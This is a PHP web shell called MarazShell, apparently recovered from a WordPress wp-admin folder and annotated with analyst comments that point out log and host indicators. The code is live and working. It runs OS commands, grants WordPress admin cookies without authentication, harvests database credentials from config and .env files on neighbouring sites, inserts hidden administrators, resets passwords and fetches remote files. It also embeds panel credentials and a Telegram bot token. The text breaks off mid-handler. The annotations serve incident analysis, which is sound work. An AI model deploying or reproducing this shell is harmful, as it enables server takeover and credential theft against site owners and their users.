File: /homepages/4/d4297730999/htdocs/wordpress/wp-admin/maraz.php
<?php
// NOTE(analysis): start-up block. Error reporting, on-screen errors and PHP
// error logging are all switched off, so failures in this file leave nothing
// in the PHP error log; the web server access log is the evidence source.
error_reporting(0);
session_start();
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@ini_set('error_log', NULL);
// Asks a fronting nginx proxy not to buffer the response.
@header('X-Accel-Buffering: no');
@header('Content-Type: text/html; charset=UTF-8');
/**
 * Replaces "/", "\", "." and ":" in a path with four Bengali letters.
 *
 * NOTE(analysis): this script carries paths in its `p`, `q` and `wp_dir`
 * parameters in this form, so no literal "/" or "../" shows up in the query
 * string. When hunting in access logs, search for the UTF-8 percent-encoded
 * letters (%E0%A6%95 through %E0%A6%98) instead of path separators.
 *
 * @param string $path Path to encode.
 * @return string Path with the four characters substituted.
 */
function encodePath($path) {
return str_replace(["/", "\\", ".", ":"], ["ক", "খ", "গ", "ঘ"], $path);
}
/**
 * Inverse of encodePath(): maps the four Bengali letters back to
 * "/", "\", "." and ":".
 *
 * @param string $path Encoded path as received in a request parameter.
 * @return string Decoded filesystem path.
 */
function decodePath($path) {
return str_replace(["ক", "খ", "গ", "ঘ"], ["/", "\\", ".", ":"], $path);
}
// NOTE(analysis): this handler sits above the script's own login gate, so it
// is reachable by any request that supplies both query parameters, without
// the panel credentials. It bootstraps WordPress from the decoded `wp_dir`,
// issues an auth cookie for the numeric user ID given in `wp_login_jump`,
// and redirects to the admin URL. Access-log entries for this file carrying
// `wp_login_jump` and `wp_dir` identify admin sessions created this way;
// during clean-up, treat existing WordPress sessions as untrusted.
if (isset($_GET['wp_login_jump']) && isset($_GET['wp_dir'])) {
$jump_dir = decodePath($_GET['wp_dir']);
if (is_dir($jump_dir)) {
chdir($jump_dir);
if (file_exists('./wp-load.php')) {
define("WP_USE_THEMES", false);
require("./wp-load.php");
$user_id = (int)$_GET['wp_login_jump'];
wp_set_current_user($user_id);
wp_set_auth_cookie($user_id);
header("Location: " . admin_url());
exit;
}
}
}
// NOTE(analysis): these strings are sent with header(), i.e. as *response*
// headers. Request-style headers (X-Forwarded-For, User-Agent, ...) showing
// up in an HTTP response are unusual and usable as a network indicator for
// this script.
$spoof_headers = [
'X-Forwarded-For: 127.0.0.1',
'X-Real-IP: 127.0.0.1',
'CF-Connecting-IP: 127.0.0.1',
'True-Client-IP: 127.0.0.1',
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
];
foreach($spoof_headers as $h) @header($h);
// Lifts the execution-time and memory limits and keeps the request running
// after the client disconnects; long-lived PHP workers tied to this file are
// a side effect worth checking in process listings.
@clearstatcache();
@set_time_limit(0);
@ignore_user_abort(true);
@ini_set('max_execution_time', 0);
@ini_set('memory_limit', '-1');
/**
 * Runs an OS command and returns its output.
 *
 * Tries shell_exec, system, passthru, exec, popen and proc_open in that
 * order and uses the first one that is available; all errors are suppressed.
 *
 * NOTE(analysis): every command-running feature of this file goes through
 * here. Listing these six functions in php.ini `disable_functions` removes
 * the capability, and a shell spawned as a child of the PHP/web-server
 * process is the host-level signal to alert on.
 *
 * @param string $c Command line, passed to the shell as given.
 * @return string|null Captured output ('' when nothing could be run).
 */
function x_exec($c) {
$r = '';
if (function_exists('shell_exec')) { $r = @shell_exec($c); }
elseif (function_exists('system')) { ob_start(); @system($c); $r = ob_get_clean(); }
elseif (function_exists('passthru')) { ob_start(); @passthru($c); $r = ob_get_clean(); }
elseif (function_exists('exec')) { @exec($c, $o); $r = @implode("\n", $o); }
elseif (is_resource($p = @popen($c, 'r'))) { while (!feof($p)) $r .= fread($p, 1024); pclose($p); }
elseif (function_exists('proc_open')) {
// stdin, stdout and stderr pipes; only stdout is read back.
$d = [['pipe', 'r'],['pipe', 'w'],['pipe', 'w']];
$pr = @proc_open($c, $d, $ps);
if (is_resource($pr)) { $r = stream_get_contents($ps[1]); @fclose($ps[0]); @fclose($ps[1]); @fclose($ps[2]); proc_close($pr); }
}
return $r;
}
// Alias of x_exec(): runs $c through the first available execution function.
function root_exec($c) { return x_exec($c); }
// Second alias of x_exec(); behaves exactly like root_exec().
function root_exec_system($c) { return x_exec($c); }
// Writes $c to file $f (errors suppressed); true unless file_put_contents() returned false.
function root_write_file($f, $c) { return @file_put_contents($f, $c) !== false; }
// Appends a "[H:i:s] "-stamped message to $_SESSION['root_log'], creating the list on first use.
// NOTE(analysis): this activity log lives only in PHP session storage, not in a log file.
function root_log($m) { if(!isset($_SESSION['root_log'])) $_SESSION['root_log']=[]; $_SESSION['root_log'][]=date("[H:i:s] ").$m; }
// Prints $m HTML-escaped plus a newline and flushes the output buffers straight away.
function wout($m) { echo htmlspecialchars($m) . "\n"; @ob_flush(); flush(); }
// Returns the canonical DOCUMENT_ROOT, or the current working directory when DOCUMENT_ROOT is not set.
function root_find_scan_base() { return realpath($_SERVER['DOCUMENT_ROOT'] ?? getcwd()); }
// Returns an ON/OFF <span> snippet saying whether PHP extension $e is loaded.
function check_ext($e) { return extension_loaded($e) ? '<span class="status-on">ON</span>' : '<span class="status-off">OFF</span>'; }
// Returns the SERVER_SOFTWARE string, or 'Unknown' when the server does not provide it.
function get_software() { return $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'; }
/**
 * Lists directories that contain a wp-config.php.
 *
 * Searches /var/www, /home, /public_html, C:\inetpub\wwwroot and the scan
 * base with `find -maxdepth 4` (or `dir /s /b` on Windows) and caches the
 * result in the session. The $limit argument is not used by the body.
 *
 * NOTE(analysis): the search is not confined to the compromised site, so on
 * shared hosting every readable neighbouring WordPress install is in scope
 * for the incident. A `find ... -name 'wp-config.php'` process started by
 * the PHP worker is a host indicator.
 *
 * @param int $limit Unused.
 * @return array Unique directory paths (keys are not re-indexed).
 */
function wp_find_paths($limit = 60) {
if(isset($_SESSION['wp_paths_cache']) && !empty($_SESSION['wp_paths_cache'])) return $_SESSION['wp_paths_cache'];
$r = [];
$b = root_find_scan_base();
$targets = ['/var/www', '/home', '/public_html', 'C:\\inetpub\\wwwroot', $b];
foreach($targets as $t) {
if(!@is_dir($t)) continue;
$cmd = "find $t -maxdepth 4 -name 'wp-config.php' 2>/dev/null";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $cmd = "dir /s /b \"$t\\wp-config.php\" 2>nul";
$res = root_exec($cmd);
foreach(explode("\n", trim($res)) as $l) {
// Keep only output lines that name an existing file.
if(trim($l) && file_exists(trim($l))) $r[] = dirname(realpath(trim($l)));
}
}
$_SESSION['wp_paths_cache'] = array_unique($r);
return $_SESSION['wp_paths_cache'];
}
/**
 * Reads database settings out of a WordPress install's wp-config.php.
 *
 * Extracts DB_NAME, DB_USER, DB_PASSWORD, DB_HOST and $table_prefix with
 * regular expressions; the file is read as text, not executed.
 *
 * NOTE(analysis): for every install this script could read, the database
 * credentials in wp-config.php should be considered disclosed and rotated.
 *
 * @param string $d WordPress directory.
 * @return array|false Keys db, user, pass, host (default 'localhost') and
 *                     prefix (default 'wp_'); false when the file is missing.
 */
function wp_get_db_config($d) {
$f = $d . DIRECTORY_SEPARATOR . 'wp-config.php';
if(!file_exists($f)) return false;
$c = file_get_contents($f);
preg_match("/define\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $c, $m1);
preg_match("/define\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $c, $m2);
preg_match("/define\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)/i", $c, $m3);
preg_match("/define\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $c, $m4);
preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]\s*;/i", $c, $m5);
return ['db'=>$m1[1]??'','user'=>$m2[1]??'','pass'=>$m3[1]??'','host'=>$m4[1]??'localhost', 'prefix'=>$m5[1]??'wp_'];
}
/**
 * Overwrites a WordPress user's password hash directly in the database.
 *
 * The stored value is a plain MD5 of $pw, written with a string-built UPDATE
 * on the `{prefix}users` table.
 *
 * NOTE(analysis): a `user_pass` value that is a bare 32-character hex string
 * is an indicator of this kind of out-of-band reset. WordPress may replace it
 * with its own hash format at the next login, so absence of such a value does
 * not clear an account; force resets for all privileged users.
 *
 * @param mysqli $m  Open database connection (presumably mysqli; it is used via ->query()).
 * @param string $pr Table prefix.
 * @param int    $id User ID.
 * @param string $pw New password; an empty value makes the function return false.
 * @return mixed Result of the query call, or false.
 */
function wp_reset_pw($m, $pr, $id, $pw) {
if(empty($pw)) return false;
$hpw = md5($pw);
return $m->query("UPDATE {$pr}users SET user_pass='$hpw' WHERE ID=$id");
}
/**
 * Creates a WordPress administrator by inserting rows directly.
 *
 * Inserts one `{prefix}users` row (login, MD5 password, e-mail, registration
 * time, status 0) and two `{prefix}usermeta` rows granting the serialized
 * `administrator` capability and user level 10.
 *
 * NOTE(analysis): accounts made this way bypass WordPress's user-creation
 * code, so columns the INSERT does not list are left at table defaults and
 * only the two usermeta keys exist. Auditing for administrators with that
 * sparse shape, and for unexpected registration times, helps find them.
 *
 * @param mysqli $m  Open database connection (presumably mysqli).
 * @param string $pr Table prefix.
 * @param string $u  Login name.
 * @param string $p  Password (stored as plain MD5).
 * @param string $e  E-mail address.
 * @return bool False when the users INSERT fails, otherwise true (the
 *              usermeta inserts are not checked).
 */
function wp_add_admin($m, $pr, $u, $p, $e) {
$hp = md5($p);
$res = $m->query("INSERT INTO {$pr}users (user_login, user_pass, user_email, user_registered, user_status) VALUES ('$u', '$hp', '$e', NOW(), 0)");
if(!$res) return false;
$id = $m->insert_id;
$m->query("INSERT INTO {$pr}usermeta (user_id, meta_key, meta_value) VALUES ($id, '{$pr}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')");
$m->query("INSERT INTO {$pr}usermeta (user_id, meta_key, meta_value) VALUES ($id, '{$pr}user_level', '10')");
return true;
}
/**
 * Deletes a user's row from `{prefix}users` and, if that succeeds, the
 * user's rows from `{prefix}usermeta`.
 *
 * NOTE(analysis): done in SQL, so no WordPress hooks fire and audit plugins
 * that rely on them will not record the deletion.
 *
 * @return bool True only when both DELETE statements succeed.
 */
function wp_delete_user($m, $pr, $id) {
return $m->query("DELETE FROM {$pr}users WHERE ID=$id") && $m->query("DELETE FROM {$pr}usermeta WHERE user_id=$id");
}
/**
 * Reads the WordPress version from wp-includes/version.php by regex.
 *
 * @param string $d WordPress directory.
 * @return string The $wp_version value, or '?.?' when the file or the
 *                assignment is not found.
 */
function wp_get_version($d) {
$f = $d . DIRECTORY_SEPARATOR . 'wp-includes' . DIRECTORY_SEPARATOR . 'version.php';
if(!file_exists($f)) return '?.?';
$c = file_get_contents($f);
preg_match("/\\\$wp_version\s*=\s*['\"]([^'\"]+)['\"]/i", $c, $m);
return $m[1] ?? '?.?';
}
/**
 * Lists up to 50 WordPress users with a coarse role label.
 *
 * For each user a second query reads the `{prefix}capabilities` usermeta
 * value; the role is 'admin' when that value contains the text
 * 'administrator', otherwise 'user'.
 *
 * @param mysqli $m  Open database connection (presumably mysqli).
 * @param string $pr Table prefix.
 * @return array Rows with ID, user_login, user_email and role; empty when
 *               the first query fails.
 */
function wp_fetch_users($m, $pr) {
$r = $m->query("SELECT ID, user_login, user_email FROM {$pr}users LIMIT 50");
$res = [];
if(!$r) return $res;
while($row = $r->fetch_assoc()) {
$meta = $m->query("SELECT meta_value FROM {$pr}usermeta WHERE user_id={$row['ID']} AND meta_key='{$pr}capabilities' LIMIT 1");
$mrow = $meta->fetch_assoc();
$row['role'] = (strpos($mrow['meta_value']??'', 'administrator') !== false) ? 'admin' : 'user';
$res[] = $row;
}
return $res;
}
/**
 * Sets DISALLOW_FILE_MODS in a site's wp-config.php to true or false.
 *
 * If the constant is already mentioned, the existing define() is rewritten;
 * otherwise a define() is inserted after each "<?php" occurrence in the file.
 *
 * NOTE(analysis): wp-config.php is modified in place. A DISALLOW_FILE_MODS
 * define the site owner did not add, or an unexplained change to the file's
 * modification time, is an indicator; presumably the setting is used to stop
 * plugin/theme updates and edits from the dashboard - confirm against the
 * site's own configuration history.
 *
 * @param string $wp_dir WordPress directory.
 * @param bool   $lock   True writes `true`, false writes `false`.
 * @return bool False when the file is missing or the write fails.
 */
function wp_toggle_lockdown($wp_dir, $lock) {
$cf = $wp_dir . DIRECTORY_SEPARATOR . 'wp-config.php';
if(!file_exists($cf)) return false;
$c = file_get_contents($cf);
$v = $lock ? 'true' : 'false';
if(strpos($c, 'DISALLOW_FILE_MODS') !== false) {
$c = preg_replace("/define\s*\(\s*['\"]DISALLOW_FILE_MODS['\"]\s*,\s*(true|false)\s*\);/i", "define('DISALLOW_FILE_MODS', $v);", $c);
} else {
$c = str_replace("<?php", "<?php\ndefine('DISALLOW_FILE_MODS', $v);", $c);
}
return @file_put_contents($cf, $c) !== false;
}
/**
 * Fetches a URL and stores the body in a local file.
 *
 * First attempt is file_get_contents() on the URL; when that returns nothing
 * and the cURL extension is present, the body is streamed to the file with
 * cURL instead.
 *
 * NOTE(analysis): both paths are outbound HTTP(S) from the web server
 * process. Egress filtering for the PHP user, and `allow_url_fopen = Off`
 * for the first path, limit this; outbound fetches by the web server to
 * code-hosting sites are worth alerting on.
 *
 * @param string $u Source URL.
 * @param string $f Destination path.
 * @return bool Whether the file was written (cURL path: whether it exists).
 */
function root_smart_download($u, $f) {
$c = @file_get_contents($u);
if($c) return @file_put_contents($f, $c) !== false;
if(function_exists('curl_init')) {
$ch = curl_init($u);
$fp = fopen($f, 'wb');
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
fclose($fp);
return file_exists($f);
}
return false;
}
// NOTE(analysis): hard-coded panel settings. The login check below compares
// the posted `user`/`pass` fields with $username/$password. The Telegram bot
// token and chat ID are what the persistence code later in this file uses
// for its notifications; as values recovered from a sample they are
// indicators to record and report, and web-server egress to
// api.telegram.org is worth alerting on. The save_settings handler rewrites
// these five assignments in the file itself, so they differ between copies.
$pagePasswordEnable = '1';
$username = 'yol';
$password = 'yol';
$telegram_token = '8585391638:AAEPl8iPyVWioco1pknrOIh9UrPIPx8x29c';
$telegram_chatid = '6099023828';
if ($pagePasswordEnable === '1') {
// Login POST: an exact match on both fields sets the session flag.
if (isset($_POST['login_action'])) {
if ($_POST['user'] === $username && $_POST['pass'] === $password) {
$_SESSION['authenticated'] = true;
header("Location: ?"); exit;
} else {
$error = "Access Denied: Invalid Credentials";
}
}
// `?logout` destroys the session.
if (isset($_GET['logout'])) { session_destroy(); header("Location: ?"); exit; }
// Without the session flag the login page that follows is served (its
// <title> is "MarazShell Login", a usable content signature).
if (!isset($_SESSION['authenticated'])) {
?>
<!DOCTYPE html>
<html>
<head>
<title>MarazShell Login</title>
<link href="https://fonts.googleapis.com/css2?family=Outfit:wght@300;400;600&family=JetBrains+Mono&display=swap" rel="stylesheet">
<style>
:root { --bg: #030303; --primary: #0070f3; --accent: #00dfd8; --text: #eaeaea; --border: rgba(255,255,255,0.1); }
body { background: var(--bg); color: var(--text); font-family: 'Outfit', sans-serif; display: flex; align-items: center; justify-content: center; height: 100vh; margin: 0; }
.login-card { background: rgba(255,255,255,0.02); border: 1px solid var(--border); padding: 40px; border-radius: 20px; width: 350px; text-align: center; box-shadow: 0 20px 50px rgba(0,0,0,0.5); backdrop-filter: blur(10px); }
h1 { font-size: 24px; margin-bottom: 30px; letter-spacing: 2px; }
h1 span { color: var(--primary); text-shadow: 0 0 15px var(--primary); }
input { width: 100%; background: rgba(0,0,0,0.3); border: 1px solid var(--border); padding: 12px; border-radius: 8px; color: #fff; margin-bottom: 15px; box-sizing: border-box; font-family: 'JetBrains Mono'; }
button { width: 100%; background: var(--primary); color: #fff; border: none; padding: 12px; border-radius: 8px; font-weight: 600; cursor: pointer; transition: 0.3s; }
button:hover { filter: brightness(1.2); transform: translateY(-2px); }
.error { color: #ff3e3e; font-size: 13px; margin-bottom: 15px; }
</style>
</head>
<body>
<div class="login-card">
<h1>MARAZ<span>SHELL</span></h1>
<?php if(isset($error)) echo "<div class='error'>$error</div>"; ?>
<form method="POST">
<input type="hidden" name="login_action" value="1">
<input type="text" name="user" placeholder="Username" required autofocus>
<input type="password" name="pass" placeholder="Password" required>
<button type="submit">AUTHENTICATE</button>
</form>
</div>
</body>
</html>
<?php
exit;
}
}
// Empty stub: the body does nothing and returns null.
function checkAuth($u, $p) {}
/**
 * Recursively scans a directory tree for files matching two PHP-backdoor
 * signatures and appends hits to $results.
 *
 * Signature 1: include/require of a path ending in a non-code extension
 * (jpg, png, txt, log, tmp, ...) or using a stream wrapper URL.
 * Signature 2: a code/command execution function called directly on a
 * request superglobal, optionally through a decode/decompress function.
 *
 * Each hit records the path, a fixed score of 100, the first matched text
 * and the file size; only the first matching signature per file is kept.
 *
 * NOTE(analysis): presumably used to locate other implants on the host -
 * confirm from the calling code. The two patterns are of the same kind a
 * defender's file scanner applies, and this file matches neither by design
 * of its own dispatch, so they should not be relied on alone.
 *
 * @param string $dir     Directory to scan.
 * @param array  $results Output list, passed by reference.
 * @return void
 */
function root_scanner_scan($dir, &$results) {
if (!is_dir($dir)) return;
$files = @scandir($dir);
if (!$files) return;
$suspicious_regex = [
'[\r\n;\/\*]+\s*\b(include|require)(_once)?\b[\s\(]*[\'"][^\n\'"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\:\/\/))',
'\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[\/\*\s]*\(+[\/\*\s]*((\$_(GET|POST|REQUEST|COOKIE)\[.{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE)\[.{0,25}))'
];
foreach ($files as $file) {
if ($file === '.' || $file === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($path)) {
root_scanner_scan($path, $results);
} else {
// Whole file is read into memory; empty or unreadable files are skipped.
$content = @file_get_contents($path);
if (!$content) continue;
foreach ($suspicious_regex as $regex) {
if (preg_match("/$regex/i", $content, $m)) {
$results[] = [
'path' => $path,
'score' => 100,
'matches' => [$m[0]],
'size' => filesize($path)
];
break;
}
}
}
}
}
/**
 * Reports whether a site's wp-config.php defines DISALLOW_FILE_MODS as true.
 *
 * Always false on Windows, and false when the file is missing, unreadable
 * or empty.
 *
 * @param string $wp_dir WordPress directory.
 * @return bool
 */
function wp_get_lock_status($wp_dir) {
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') return false;
$config_file = $wp_dir . DIRECTORY_SEPARATOR . 'wp-config.php';
if (!file_exists($config_file)) return false;
$content = @file_get_contents($config_file);
if (!$content) return false;
return (preg_match("/define\s*\(\s*['\"]DISALLOW_FILE_MODS['\"]\s*,\s*true\s*\);/i", $content) ? true : false);
}
/**
 * Looks up a site's URL in the `{prefix}options` table.
 *
 * Reads the `siteurl` option and falls back to `home` when that is empty.
 *
 * @param mysqli|null $mysqli Database connection; a falsy value returns "".
 * @param string      $prefix Table prefix.
 * @return string URL without trailing slash, or "" when nothing is found.
 */
function get_site_url($mysqli, $prefix) {
if (!$mysqli) return "";
$res = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='siteurl' LIMIT 1");
$row = $res ? $res->fetch_assoc() : null;
$url = $row['option_value'] ?? "";
if (!$url) {
$res = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='home' LIMIT 1");
$row = $res ? $res->fetch_assoc() : null;
$url = $row['option_value'] ?? "";
}
return rtrim($url, '/');
}
/**
 * Reads the `whl_page` option from the `{prefix}options` table.
 *
 * NOTE(analysis): presumably the custom login slug stored by a
 * hide-login plugin - confirm. If so, a renamed login URL gives no
 * protection once the database is readable.
 *
 * @param mysqli|null $mysqli Database connection; a falsy value returns false.
 * @param string      $prefix Table prefix.
 * @return string|false Option value, or false when absent.
 */
function wp_get_hide_login($mysqli, $prefix) {
if (!$mysqli) return false;
$res = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='whl_page' LIMIT 1");
$row = $res ? $res->fetch_assoc() : null;
return $row['option_value'] ?? false;
}
/**
 * Lists application configuration files under a directory.
 *
 * Runs `find -maxdepth 10 -type f` (or `dir /s /b` on Windows) for eight
 * well-known file names and keeps the output lines that are existing files.
 *
 * NOTE(analysis): the file names cover several CMS/framework families, so
 * the credential exposure from this script is not limited to WordPress.
 * Any such file readable by the web-server user under $base_dir should be
 * treated as disclosed.
 *
 * @param string $base_dir Directory to search.
 * @return array Unique file paths.
 */
function root_find_all_configs($base_dir) {
$found = [];
$targets = [
'wp-config.php', '.env', 'configuration.php', 'config.php',
'database.php', 'env.php', 'local.xml', 'settings.php'
];
$cmd = "find \"$base_dir\" -maxdepth 10 -type f \( " . implode(" -o ", array_map(function($t){ return "-name '$t'"; }, $targets)) . " \) 2>/dev/null";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$cmd = "dir /s /b " . implode(" ", array_map(function($t) use ($base_dir){ return "\"$base_dir\\$t\""; }, $targets)) . " 2>nul";
}
$res = root_exec($cmd);
foreach(explode("\n", trim($res)) as $path) {
$path = trim($path);
if ($path && @is_file($path)) $found[] = $path;
}
return array_unique($found);
}
/**
 * Pulls database credentials out of a configuration file by regex.
 *
 * Handles three file names: wp-config.php (DB_* defines), .env (DB_* keys)
 * and configuration.php (public $db/$user/$password/$host properties, with
 * a fallback to $db_name/$db_username/$db_password/$db_host variables).
 * Other file names keep type 'Unknown' and no values are extracted.
 *
 * NOTE(analysis): rotate database passwords for every application whose
 * config file matches one of these shapes and was readable by the
 * web-server user; restricting those files to the owning account reduces
 * cross-site exposure on shared hosts.
 *
 * @param string $file Path of the configuration file.
 * @return array|false Keys file, type, host, user, pass, db; false when the
 *                     file is unreadable/empty or neither user nor db was found.
 */
function root_extract_creds($file) {
$content = @file_get_contents($file);
if (!$content) return false;
$info = ['file' => $file, 'type' => 'Unknown', 'host' => 'localhost', 'user' => '', 'pass' => '', 'db' => ''];
$base = basename($file);
if ($base == 'wp-config.php') {
$info['type'] = 'WordPress';
preg_match("/define\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $content, $m); $info['db'] = $m[1] ?? '';
preg_match("/define\(\s*'DB_USER'\s*,\s*'([^']+)'/", $content, $m); $info['user'] = $m[1] ?? '';
preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'([^']*)'/", $content, $m); $info['pass'] = $m[1] ?? '';
preg_match("/define\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $content, $m); $info['host'] = $m[1] ?? 'localhost';
} elseif ($base == '.env') {
$info['type'] = 'Laravel/Env';
preg_match("/DB_DATABASE=([^\s]+)/", $content, $m); $info['db'] = trim($m[1], '"\'') ?? '';
preg_match("/DB_USERNAME=([^\s]+)/", $content, $m); $info['user'] = trim($m[1], '"\'') ?? '';
preg_match("/DB_PASSWORD=([^\s]*)/", $content, $m); $info['pass'] = trim($m[1], '"\'') ?? '';
preg_match("/DB_HOST=([^\s]+)/", $content, $m); $info['host'] = trim($m[1], '"\'') ?? 'localhost';
} elseif ($base == 'configuration.php') {
if (strpos($content, 'class JConfig')) $info['type'] = 'Joomla';
elseif (strpos($content, 'WHMCS')) $info['type'] = 'WHMCS';
preg_match("/public \\\$db\s*=\s*'([^']+)';/", $content, $m); $info['db'] = $m[1] ?? '';
preg_match("/public \\\$user\s*=\s*'([^']+)';/", $content, $m); $info['user'] = $m[1] ?? '';
preg_match("/public \\\$password\s*=\s*'([^']*)';/", $content, $m); $info['pass'] = $m[1] ?? '';
preg_match("/public \\\$host\s*=\s*'([^']+)';/", $content, $m); $info['host'] = $m[1] ?? 'localhost';
// Second shape: plain $db_* variables, tried only when no db name was found.
if (!$info['db']) {
preg_match("/\\\$db_name\s*=\s*['\"]([^'\"]+)['\"];/", $content, $m); $info['db'] = $m[1] ?? '';
preg_match("/\\\$db_username\s*=\s*['\"]([^'\"]+)['\"];/", $content, $m); $info['user'] = $m[1] ?? '';
preg_match("/\\\$db_password\s*=\s*['\"]([^'\"]*)['\"];/", $content, $m); $info['pass'] = $m[1] ?? '';
preg_match("/\\\$db_host\s*=\s*['\"]([^'\"]+)['\"];/", $content, $m); $info['host'] = $m[1] ?? 'localhost';
}
}
return ($info['user'] || $info['db']) ? $info : false;
}
/**
 * Builds a URL pointing back at this script with `wp_login_jump` (user ID)
 * and `wp_dir` (encoded WordPress directory) query parameters.
 *
 * NOTE(analysis): the URL targets the handler at the top of this file that
 * issues a WordPress auth cookie; the scheme and host are taken from the
 * current request, so the link is valid on whichever host serves the file.
 *
 * @param string $wp_dir WordPress directory.
 * @param int    $uid    WordPress user ID.
 * @return string Absolute URL.
 */
function wp_auto_login($wp_dir, $uid) {
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://";
$host = $_SERVER['HTTP_HOST'] ?? 'localhost';
// Request path without the query string.
$path = explode('?', $_SERVER['REQUEST_URI'])[0];
return $protocol . $host . $path . "?wp_login_jump=" . (int)$uid . "&wp_dir=" . encodePath($wp_dir);
}
/**
 * Formats a byte count for display.
 *
 * Values of 1 KB and above are shown with two decimals in the largest
 * fitting unit (KB, MB, GB); smaller values are shown as whole bytes.
 *
 * @param int|float $bytes Size in bytes.
 * @return string Human-readable size such as "1.50 KB" or "0 bytes".
 */
function formatSizeUnits($bytes) {
    // Largest unit first so the first threshold reached wins.
    $scales = ['GB' => 1073741824, 'MB' => 1048576, 'KB' => 1024];
    foreach ($scales as $suffix => $divisor) {
        if ($bytes >= $divisor) {
            return number_format($bytes / $divisor, 2) . ' ' . $suffix;
        }
    }
    if ($bytes > 1) {
        return $bytes . ' bytes';
    }
    return ($bytes == 1) ? $bytes . ' byte' : '0 bytes';
}
/**
 * Returns the Font Awesome <i> tag used to represent a directory entry.
 *
 * Directories get a folder icon; `error_log` and `.htaccess` have their own
 * icons; other files are mapped by lower-cased extension, with a generic
 * file icon as fallback.
 *
 * @param string $file  File name.
 * @param bool   $isDir Whether the entry is a directory.
 * @return string HTML snippet.
 */
function fileIcon($file, $isDir = false) {
    if ($isDir) {
        return '<i class="fas fa-folder text-warning"></i>';
    }

    $image = 'far fa-image text-muted';
    $archive = 'far fa-file-archive text-warning';
    $classesByExt = [
        'php' => 'fab fa-php text-primary',
        'html' => 'fab fa-html5 text-danger',
        'css' => 'fab fa-css3 text-info',
        'js' => 'fab fa-js text-warning',
        'py' => 'fab fa-python text-success',
        'jpg' => $image,
        'jpeg' => $image,
        'png' => $image,
        'gif' => $image,
        'zip' => $archive,
        'rar' => $archive,
        'txt' => 'far fa-file-alt text-muted',
        'sql' => 'fas fa-database text-info'
    ];
    $extension = strtolower(pathinfo($file, PATHINFO_EXTENSION));

    // Two file names are special-cased ahead of the extension lookup.
    if ($file == 'error_log') {
        return '<i class="fas fa-bug text-danger"></i>';
    }
    if ($file == '.htaccess') {
        return '<i class="fas fa-shield-alt text-secondary"></i>';
    }

    $cssClass = isset($classesByExt[$extension]) ? $classesByExt[$extension] : 'far fa-file text-muted';
    return '<i class="' . $cssClass . '"></i>';
}
// Redundant functions removed (moved to top)
// NOTE(analysis): working-directory selection. The `p` (or, failing that,
// `q`) query parameter is decoded with decodePath() and accepted whenever it
// names an existing directory; nothing ties it to $root_path, so the panel
// operates on any directory the PHP user can reach. `open_basedir` and
// per-site system users are the controls that bound this.
$root_path = realpath(__DIR__);
$current_path = $root_path;
if (isset($_GET['p']) && !empty($_GET['p'])) {
$decoded = decodePath($_GET['p']);
if (is_dir($decoded)) {
$current_path = realpath($decoded);
}
} elseif (isset($_GET['q']) && !empty($_GET['q'])) {
$decoded = decodePath($_GET['q']);
if (is_dir($decoded)) {
$current_path = realpath($decoded);
}
}
// PATH is the base directory used by the file and database handlers below.
define("PATH", $current_path);
$ajax_response = null;
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
if (isset($_POST['wp_action'])) {
$wp_dir = $_POST['wp_dir'];
$cfg = wp_get_db_config($wp_dir);
$mysqli = @new mysqli($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['db']);
if ($mysqli->connect_errno) {
$ajax_response = ['status' => 'error', 'message' => "DB Connection error: " . $mysqli->connect_error];
} else {
if ($_POST['wp_action'] == 'reset_pw') {
$uid = intval($_POST['reset_uid']);
$newpw = trim($_POST['newpw']);
if (wp_reset_pw($mysqli, $cfg['prefix'], $uid, $newpw)) {
$ajax_response = ['status' => 'success', 'message' => "Password reset for user ID $uid: $newpw"];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to reset password."];
}
} elseif ($_POST['wp_action'] == 'add_admin') {
$user = trim($_POST['new_user']);
$pass = trim($_POST['new_pass']);
$email = trim($_POST['new_email']);
if (wp_add_admin($mysqli, $cfg['prefix'], $user, $pass, $email)) {
$ajax_response = ['status' => 'success', 'message' => "Admin '$user' added successfully!"];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to add admin."];
}
} elseif ($_POST['wp_action'] == 'delete_user') {
$uid = intval($_POST['uid']);
if (wp_delete_user($mysqli, $cfg['prefix'], $uid)) {
$ajax_response = array('status' => 'success', 'message' => "User ID " . $uid . " deleted.");
} else {
$ajax_response = array('status' => 'error', 'message' => "Failed to delete user.");
}
} elseif ($_POST['wp_action'] == 'toggle_lock') {
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
